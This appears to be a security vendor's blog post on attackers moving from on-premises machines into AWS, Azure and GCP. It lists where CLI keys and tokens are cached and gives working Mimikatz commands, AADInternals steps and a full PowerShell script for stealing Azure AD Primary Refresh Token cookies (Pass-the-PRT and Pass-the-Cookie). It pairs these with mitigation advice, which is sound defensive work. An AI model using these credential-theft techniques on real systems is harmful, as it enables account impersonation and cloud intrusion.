BlogBridging the Security Gap: Mitigating Lateral Movement Risks from On-Premises to Cloud Environments

Bridging the Security Gap: Mitigating Lateral Movement Risks from On-Premises to Cloud Environments

This blog post will discuss lateral movement risks from on-prem to the cloud. We will explain attacker TTPs, and outline best practices for cloud builders and defenders to help secure their cloud environments and mitigate risk.

16 minutes read

In our previous blog post in this series discussing lateral movement in the cloud, we delved into the application of lateral movement techniques from the cloud domain to managed Kubernetes clusters and assessed how attack vectors can differ across various cloud providers. 

In this fourth blog post, we’ll introduce some common lateral movement techniques that enable attackers to move laterally from on-prem domains to cloud environments. These techniques present unique risks and challenges that need to be addressed by cloud security professionals, developers, and DevOps teams alike. Understanding the threats posed by lateral movement is crucial to safeguarding your data and assets in the cloud. The gray area between cloud and on-prem environments is often overlooked as security ownership may be shared by multiple teams. In this blog, we will explore these risks and challenges, and discuss strategies for mitigating them.

On-prem-to-cloud attacker TTPs

Recent attacks have underscored the importance of addressing critical risks related to lateral movement attacks from an organization's on-prem network to its cloud domain. For instance, in one attack last month, MERCURY, a nation-state actor linked to the Iranian government, gained initial access to a hybrid environment and then used multiple tactics to discover additional credentials to extend its access to the organization's cloud infrastructure. Similarly, in the LAPSUS$ attack, the adversary conducted extensive reconnaissance and discovery operations to exfiltrate cloud credentials that would allow it to access the organization's cloud infrastructure.  

By leveraging their foothold in the environments, the threat actors were able to move laterally from on-prem to the cloud domain and execute destructive operations. These techniques and functionalities include—but are not limited to—exploiting long-term cleartext cloud keys and compromising AAD-integrated on-prem devices.

Stored and cached long-term cleartext cloud keys

Many users in an organization tend to utilize long-term cleartext cloud keys for programmatic access by using the cloud provider’s native CLI from their own on-prem computer. Some keys need to be downloaded manually and stored locally in a specific file such as AWS user access keys, whereas others like AAD/GCP user access/refresh tokens and AAD service principal secrets are cached automatically the moment a user authenticates to their cloud identity. 

These long-term cloud keys pose a significant security risk in the event of compromise by malicious actors, which is why it’s important to be familiar with safer alternatives and configurations that can mitigate the risk of lateral movement from on-prem to the cloud.

1. AWS user access keys

AWS access keys are typically stored locally on a machine in the AWS credentials file, which is located at the following path: 

  • Linux or macOS: ~/.aws/credentials (stored in cleartext) 

  • Windows: C:\Users\<username>\.aws\credentials (stored in cleartext)

The file is in INI format and contains the access key ID and secret access key for one or more IAM users or roles. These cloud keys are unencrypted and therefore pose a considerable security risk to cloud environments should a machine be compromised.  

On-prem users tend to use these AWS cloud keys to authenticate and execute cloud APIs on behalf of the IAM identity via the AWS CLI. 

It’s crucial to note that while AWS role access keys are temporary and expire by default within 1 hour, AWS user access keys never expire, allowing adversaries to gain persistence in the AWS cloud domain. 

2. Azure user access tokens and refresh tokens

Once an AAD user has been authenticated and has signed in to an Azure subscription via the Azure CLI from an on-prem machine (e.g. by running the az login command), the generated access token and refresh token are automatically cached in a local file called msal_token_cache with the following path: 

  • Linux or macOS: ~/.azure/msal_token_cache.json (cached in cleartext) 

  • Windows: C:\Users\<username>\.azure\msal_token_cache.bin (encrypted with DPAPI in local user context) 

The cached access token and refresh token are designed to allow the user to perform multiple Azure CLI operations without the need for re-authentication. When the access token expires, the Azure CLI automatically uses the cached refresh token to obtain a new access token. 

According to the official Microsoft documentation, “the default lifetime of an access token is variable. When issued, an access token’s default lifetime is assigned a random value ranging between 60-90 minutes (75 minutes on average).” On the other hand, the refresh token’s default lifetime is 90 days, which poses a greater security risk: adversaries may gain access to the cached refresh token, generate a new access token, move laterally to the AAD domain, and access the AAD user’s cloud resources. 

In Windows machines, although the file is encrypted with the local user’s machine’s Data Protection Application Programming Interface (DPAPI) MasterKey, it can easily be decrypted if the attackers gain administrative privileges on the local machine. 

3. Azure service principal secrets 

Upon signing in with a service principal using its associated secrets from the Azure CLI (e.g. by running the az login –service-principal -u <app-id> -p <password> --tenant <tenant> command), the tenant ID, client ID, and service principal secret are automatically cached in a local file called service_principal_entries with the following path: 

  • Linux or macOS: ~/.azure/service_principal_entries.json (cached in cleartext) 

  • Windows: C:\Users\<username>\.azure\service_principal_entries.bin (encrypted with DPAPI in local user context) 

Since the lifetime of service principal secrets is usually very long (by default they expire after 6 months), adversaries may gain access to the cached secret, authenticate as the service principal, move laterally to the AAD domain, and access the service principal’s cloud resources. Similar to access and refresh tokens, the service_principal_entries local file can be decrypted by gaining administrative privileges on a Windows machine. 

4. GCP user access tokens and refresh tokens 

Upon authenticating to GCP from an on-prem machine with Google user credentials via the Gcloud Command-Line Interface (e.g. by running the gcloud auth login command), the generated access and refresh tokens are cached as cleartext in local files named access_tokens.db and credentials.db, respectively. Both files are SQLite database files with the following path: 

  • Linux or macOS: ~/.config/gcloud 

  • Windows: C:\Users\<username>\AppData\Roaming\gcloud 

Like with Azure, the cached access and refresh tokens allow the user to perform multiple Gcloud CLI operations without re-authenticating. When the access token expires, the Gcloud CLI automatically uses the cached refresh token to obtain a new access token. 

Whereas access tokens are valid for 1 hour by default, GCP refresh tokens do not have a specified lifetime and simply stop working. This lack of expiration may therefore enable an adversary to gain access to the cached refresh token, generate a new access token, move laterally to the GCP account, and finally access the compromised user’s cloud resources.

5. GCP service account private keys

Upon signing in with a service account via its associated private key from the Gcloud CLI (e.g. by running the gcloud auth activate-service-account --key-file=<sa-private-key> command), all the service account details including its private key value are cached locally as cleartext in the database credentials.db file. 

By default, service account keys do not have an expiration date and remain valid until deleted. An attacker may consequently leverage this by gaining access to the cached service account’s private key, authenticating as the service account, moving laterally to the GCP account, and accessing the service account’s cloud resources.

6. SSH private keys associated with cloud compute instances 

Attackers might compromise SSH private keys on an on-prem device associated with cloud compute instances (e.g. EC2s and VMs), authenticate to one of them, move laterally, and gain an initial foothold within the cloud domain. 

Once the threat actors have access to the SSH private key, they can generate its associated public key and discover the domain name or IP address of the cloud compute instance to which the local user has previously connected. This information is stored in the local known_hosts file with the following path: 

  • Linux or macOS: ~/.ssh/known_hosts 

  • Windows: C:\Users\<username>\AppData\Roaming\ssh\known_hosts

With the SSH private key and the server’s IP address, the attackers can brute-force usernames or exploit default users within specific types of compute instances. For example, common default users for popular Linux-based AMIs are ec2-user for Amazon Linux 2 and ubuntu for Ubuntu instances.

Compromised AAD joined/registered/hybrid-joined devices 

There are three types of on-prem devices that can integrate with Azure AD: AAD joined, AAD registered, and hybrid AAD joined devices. The choice of integration method depends on an organization's requirements and limitations for device management and authentication. All three devices enable a seamless Single Sign-On (SSO) experience on Windows 10 or later, Windows Server 2016 or later, iOS, and Android. In other words, the machine that is joined/registered/hybrid-joined can be managed and authenticated by AAD. 

To enhance the SSO experience on these devices, AAD issues a security token called the Primary Refresh Token (PRT). The PRT allows users to access resources and applications protected by AAD without needing to enter their credentials each time. It is issued when a user signs in to an AAD joined/hybrid-joined device using their organizational AAD credentials or adds a secondary work account to their AAD registered device. 

With AAD joined/hybrid-joined devices, the PRT is automatically renewed every 4 hours as long as the user remains signed in; with AAD-registered devices, the PRT is renewed either when the refresh token or the PRT is invalidated (requiring the user to reauthenticate). Once a PRT has been issued, it is valid for 14 days. 

The following techniques enable adversaries to exfiltrate and abuse PRTs associated with local AAD users in order to impersonate them and access their cloud resources. 

1. Pass-the-PRT attack 

Pro: exfiltrates any local AAD user’s PRT tokens. 

Cons: Requires local admin privileges; can easily be detected or blocked by most AV/EDR solutions (including the built-in Microsoft Windows Defender). 

This technique involves stealing any local AAD user’s PRT tokens from a device’s memory. Once an attacker obtains a PRT token, they also extract a session key that is issued together with the token. The session key is encrypted using DPAPI with the local AAD user’s machine’s MasterKey and is used as the Proof-of-Possession (PoP) key for any token request or PRT renewal. 

Ultimately, possessing a PRT token and decrypted session key enables an adversary to generate PRT cookies and authenticate as the AAD user, thereby accessing cloud resources and services in AAD/ARM with the user’s cloud permissions. 

The Pass-the-PRT attack can be executed with the Mimikatz and AADInternals tools: 

  • Using Mimikatz, the attacker exfiltrates the PRT token from memory (LSASS). Initially, they need to execute the privilege::debug command to enable the SeDebugPrivilege, which allows them to debug and interact with system processes including the Local Security Authority Subsystem Service (LSASS) process. Then, the attacker can execute the sekurlsa::cloudap command to exfiltrate the PRT token (colored in red in the figure below) and the encrypted session key (colored in purple). The attacker also discovers that the PRT token is associated with the AAD user LiorTest.

PRT token exfiltration from LSASS
  • Next, the attacker needs to decrypt the session key using the DPAPI MasterKey associated with the local AAD user. To access DPAPI, the attacker must escalate their privileges to SYSTEM by executing the Token::elevate and Dpapi::cloudapkd /keyvalue:<encrypted-session-key> /unprotect commands.

Session key decryption using DPAPI MasterKey
  • The attacker then utilizes the PRT token and the decrypted session key (clear key value) to generate a PRT cookie with a nonce using AADInternals.

# Add the PRT to a variable

$MimikatzPRT = "<PRT-Token>"

# Add padding

while($MimikatzPRT.Length % 4) {$MimikatzPRT += "="}

# Convert from Base 64

$PRT = [text.encoding]::UTF8.GetString([convert]::FromBase64String($MimikatzPRT))

# Add the session key (Clear key) to a variable

$MimikatzKey = "<Clear-Key>"

# Convert to byte array and base 64 encode

$SKey = [convert]::ToBase64String( [byte[]] ($MimikatzKey -replace '..', '0x$&,' -split ',' -ne ''))

# Generate a new PRTToken with nonce

New-AADIntUserPRTToken -RefreshToken $PRT -SessionKey $SKey -GetNonce
PRT cookie creation
  • The attacker navigates to https://login.microsoftonline.com/, clears all existing cookies, and injects the PRT cookie in their browser session using the following cookie values: 

    • Name: x-ms-RefreshTokenCredential 

    • Value: the generated PRT cookie 

    • HttpOnly: set to True

PRT cookie injection
  • The adversary finally refreshes the page and authenticates as the AAD user (LiorTest).

AAD user impersonation

2. Pass-the-Cookie attack

Pros: easily executed; does not require local admin privileges; less likely to be detected or blocked; better for defense evasion. 

Cons: only exfiltrates the compromised local AAD user’s PRT cookie. 

This technique involves directly stealing the PRT cookie from the compromised local AAD user (the cookie is digitally signed by the PRT session key). Pass-the-Cookie uses the built-in BrowserCore.exe utility that is installed by default on all AAD joined devices (located at C:\Program Files\Windows Security\BrowserCore) and is utilized by Microsoft Edge and Chrome web browsers to implement Azure SSO via PRT cookie generation.  

An adversary can run the following PS script (adapted from AADInternals’ Get-UserPRTToken) to exfiltrate a PRT cookie associated with a compromised local AAD user and impersonate their identity:

# Get the nonce
$response = Invoke-RestMethod -UseBasicParsing -Method Post -Uri "https://login.microsoftonline.com/Common/oauth2/token" -Body "grant_type=srv_challenge"
$nonce = $response.Nonce


# There are two possible locations
$locations = @(
   "$($env:ProgramFiles)\Windows Security\BrowserCore\browsercore.exe"
   "$($env:windir)\BrowserCore\browsercore.exe"
     )

# Check the locations
foreach($file in $locations)
{
  if(Test-Path $file)
    {
      $browserCore = $file
    }
}

if(!$browserCore)
{
  throw "Browsercore not found!"
}

# Create the process
$p = New-Object System.Diagnostics.Process
$p.StartInfo.FileName = $browserCore
$p.StartInfo.UseShellExecute = $false
$p.StartInfo.RedirectStandardInput = $true
$p.StartInfo.RedirectStandardOutput = $true
$p.StartInfo.CreateNoWindow = $true

# Create the message body
$body = @"
{
  "method":"GetCookies",
  "uri":"https://login.microsoftonline.com/common/oauth2/authorize?sso_nonce=$nonce",
  "sender":"https://login.microsoftonline.com"
}
"@
# Start the process
$p.Start() | Out-Null
$stdin =  $p.StandardInput
$stdout = $p.StandardOutput

# Write the input
$stdin.BaseStream.Write([bitconverter]::GetBytes($body.Length),0,4) 
$stdin.Write($body)
$stdin.Close()

# Read the output
$response=""
while(!$stdout.EndOfStream)
{
  $response += $stdout.ReadLine()
}

Write-Debug "RESPONSE: $response"
        
$p.WaitForExit()

# Strip the stuff from the beginning of the line
$response = $response.Substring($response.IndexOf("{")) | ConvertFrom-Json

# Check for error
if($response.status -eq "Fail")
{
  Throw "Error getting PRT: $($response.code). $($response.description)"
}

# Return the last one
$tokens = $response.response.data
if($tokens.Count -gt 1)
{
  return $tokens[$tokens.Count - 1]
}
else
{
  return $tokens
} 

Recommended best practices

Here are 5 key best practices that any organization should implement in its environment to mitigate the risk of an on-prem-to-cloud lateral movement attack:

1. Secure AAD joined/registered/hybrid-joined devices

  • Restrict the number of local administrators 

Limiting the number of local administrators authorized on your AAD joined or registered devices can lower the risk of device compromise via an admin user. This also decreases the probability of total device compromise and exfiltration of all PRTs linked to a local AAD user. 

  • Create “Attack Surface Reduction” (ASR) rules 

Attack Surface Reduction (ASR) rules are a set of security features introduced in Windows 10 and Windows Server 2016 that are designed to prevent malware attacks by reducing the attack surface. It’s highly recommended to enable the following ASR rule: “Block credential stealing from the Windows local security authority subsystem”. This ASR rule stops credential stealing by locking down Local Security Authority Subsystem Service (LSASS) and thus keeping malicious actors from accessing your device’s memory and sensitive data such as PRTs.  

However, the rule should initially be configured in Audit mode since Block mode may impede legitimate processes that need to be excluded before being deployed in production. 

To deploy the ASR rule in Audit mode, execute the following PowerShell command:

Add-MpPreference -AttackSurfaceReductionRules_Ids 9e6c4e1f-7d60-472f-ba1a-
a39ef669e4b2 -AttackSurfaceReductionRules_Actions AuditMode

To deploy it in Block mode, execute the following PowerShell command:

Add-MpPreference -AttackSurfaceReductionRules_Ids 9e6c4e1f-7d60-472f-ba1a-
a39ef669e4b2 -AttackSurfaceReductionRules_Actions Enabled 
  • Enable MFA and require strong passwords 

Make sure a strong password is configured for each AAD user, especially for highly privileged users added to AAD joined/registered devices. Moreover, enable MFA on Windows devices through Windows Hello for Business. You may also consider creating a tenant-wide policy that configures use of Windows Hello for Business on Windows 10 or Windows 11 devices at the time of enrollment in Microsoft Intune, or alternatively, using an Identity protection profile to manage Windows Hello for Business on groups of devices that have already enrolled in Intune. 

This best practice helps reduce the likelihood of device compromise via RDP brute-forcing.

2. Adopt alternatives for AWS programmatic access  

To reduce the security risk associated with long-term AWS cloud keys, consider using any of the following alternatives:

  • Utilize AWS IAM Identity Center 

The AWS IAM Identity Center is a web-based portal that allows administrators to manage user access to multiple accounts and business applications from a single portal, while providing users with an SSO experience. 

AWS CLI can be configured to authenticate users with the IAM Identity Center to obtain temporary credentials to execute CLI commands using the SSO token provider configuration or your AWS SDK. As long as you are signed in and the session has not ended, the AWS CLI automatically renews expired credentials. Sessions can last anywhere from 15 minutes to 7 days and strict MFA policies can also be configured for each sign-in.

  • Leverage AWS CloudShell 

AWS CloudShell is a fully managed browser-based shell environment that enables users to interact with their AWS resources from a CLI using common Linux utilities, programming languages, and scripts. It’s an on-demand environment that is pre-configured with the CLI and includes pre-installed tools for popular programming languages such as Python, Node.js, and Ruby. 

AWS CloudShell is a safer alternative to long-term cloud keys when resources can only be accessed by logging in to the console–it eliminates the risks associated with key storage, management, exposure, loss, and theft.

3. Secure Azure access tokens, refresh tokens, and secrets 

  • Upgrade your Azure CLI version 

In the event your Azure CLI is below v2.30.0, upgrade it as soon as possible (the current version as of this writing is 2.46.0). Starting with v2.30.0, Azure CLI uses  Microsoft Authentication Library (MSAL) as the underlying authentication library; previous versions use Azure Active Directory Authentication Library (ADAL) and cache the tokens and service principal entries in a file named accessToken.json. This file is stored unencrypted in all types of operating systems. MSAL, on the other hand, utilizes the AAD v2.0 authentication flow to provide more functionality and increase security for token caching, such as encrypting the tokens and service principal entries on Windows machines via DPAPI. 

Although an attacker might still be able to decrypt those cached files using with local admin privileges, this security measure is important as it reduces the potential attack surface. 

You can validate your current Azure CLI version by running the following command: az version. 

  • Configure AAD Conditional Access policy to minimize refresh token lifetime 

Sign-in frequency defines the time period before a user must sign in again to access a resource. The AAD default configuration for sign-in frequency is a rolling window of 90 days, or in other words, the lifetime of a refresh token. As a best practice, it’s highly recommended to reduce this lifetime to limit the possibility of a refresh token being compromised and abused to generate new access tokens associated with AAD users. 

To customize the refresh token’s default lifetime, consider creating a Conditional Access policy that controls a refresh token’s expiration date.  

  • Use service principal certificates for authentication 

Service principal authentication via certificates rather than secrets is deemed more secure since certificates are less prone to exposure. Given service principal secrets are string values, they are often stored in config files, hardcoded scripts, or simply saved by an admin and thus, pose a greater security risk of being compromised.   

Additionally, no credentials or service principal entries are cached locally on the machine when authenticating with AAD service principals with certificates via the Azure CLI. However, when authenticating with secrets , all the service principal entries required for authentication (tenant ID, client ID, and secret) are cached locally on the machine. 

  • Utilize Azure Cloud Shell 

Azure Cloud Shell is a terminal that allows you to manage your Azure resources through an interactive, authenticated, and browser-accessible interface. You can choose between Bash and PowerShell, depending on your preferred shell experience. Cloud Shell runs on a temporary host provided for each user session, ensuring a secure and personalized environment. Your Cloud Shell session times out after 20 minutes of inactivity. 

Azure Cloud Shell eliminates the need to authenticate as your AAD user via the Azure CLI, therefore mitigating the risk of cached token exposure or theft.

4. Secure cached GCP access tokens, refresh tokens, and keys  

  • Curb the session duration of refresh tokens 

Although GCP refresh tokens never expire, as an administrator you can set a specific session length that will define how long users can access the GCP console and Cloud SDK (Gcloud CLI) without having to re-authenticate. 

To set the re-authentication policy for your GCP account, follow the steps described here. As a best practice, it’s highly recommended to restrict the session duration of refresh tokens to reduce the likelihood of a token being compromised and abused to generate new access tokens associated with GCP users. 

  • Set expiration date for service account keys 

By default, service account keys never expire, but you can change this by setting an expiration date for all newly created keys in your project, folder, or organization. To set an expiration date, add an organization policy that enforces the constraints/iam.serviceAccountKeyExpiryHours constraint. Enforcing this constraint for your project, folder, or organization will set an expiration date for all subsequent, newly created service account keys within the parent resource–existing keys will not be affected. 

  • Leverage GCP user credentials as a proxy for a service account in local development 

As a developer, you usually set the GOOGLE_APPLICATION_CREDENTIALS environment variable to include the JSON key for a service account so that when a GCP client library or SDK makes a request to a GCP service, it will authenticate using the service account. 

When developing or testing your code locally on your on-prem machine, it’s advised to use your GCP user credentials as a proxy for a service account in light of security risks associated with service account keys such as key exposure and default lack of expiration dates . 

To use this authentication method for your GCP SDKs, make sure the GOOGLE_APPLICATION_CREDENTIALS environment variable is not set and run the following command to authenticate as a GCP user: gcloud auth application-default login.

  • Use GCP Cloud Shell 

GCP Cloud Shell is an interactive, web-based shell environment that is hosted in the cloud. It allows users to access a command-line interface within a web browser and execute various commands and run scripts as the logged-in GCP user. The Cloud Shell environment includes popular command-line tools like  gcloud, kubectl, and bq, as well as language-specific tools such as Python, Java, and Node.js. It also provides an integrated code editor, file editor, and web preview functionality. 

GCP Cloud Shell eliminates the need to authenticate as your GCP user via the Gcloud CLI, therefore mitigating the risk of cached token exposure or theft.

5. Authenticate to compute instances using cloud APIs 

In the event you’re running compute instances in AWS or GCP (EC2s and VM instances), consider authenticating to these instances through dedicated cloud services based on IAM permissions rather than SSH or RDP authentication.  

Authenticating to compute instances via AWS SSM or GCP IAP may provide a more secure, centralized, and streamlined way to manage infrastructure access. These services enable you to leverage IAM to define granular permissions for specific users or groups, which can help limit access to your instances. Moreover, SSM and IAP log all user activity centrally, providing you with a clear audit trail of who accessed your instances, as well as when and where they did so,  and in doing so facilitating the investigation process.

Summary 

In this fourth blog post, we explored the topic of lateral movement techniques from an on-prem domain to the cloud. We covered two techniques (Pass-the-PRT and Pass-the-Cookie) for moving laterally to an AAD environment by compromising an on-prem AAD joined/registered/hybrid-joined device. 

We also discussed how hackers can move laterally to different cloud domains by accessing various cleartext long-term access keys, access tokens, refresh tokens, secrets, and private keys stored or cached in compromised on-prem devices. Additionally, we highlighted the potential risks posed by private SSH keys, which could allow unauthorized access to cloud compute resources. 

To address these security risks, we provided recommended best practices for each lateral movement technique to help organizations mitigate the risk of lateral movement. Our goal with this blog post was to elaborate on the importance of securing on-prem devices to prevent unauthorized access to cloud environments and to provide actionable steps that organizations can take to enhance their security posture. 

Continue reading

Get a personalized demo

Ready to see Wiz in action?

“Best User Experience I have ever seen, provides full visibility to cloud workloads.”
David EstlickCISO
“Wiz provides a single pane of glass to see what is going on in our cloud environments.”
Adam FletcherChief Security Officer
“We know that if Wiz identifies something as critical, it actually is.”
Greg PoniatowskiHead of Threat and Vulnerability Management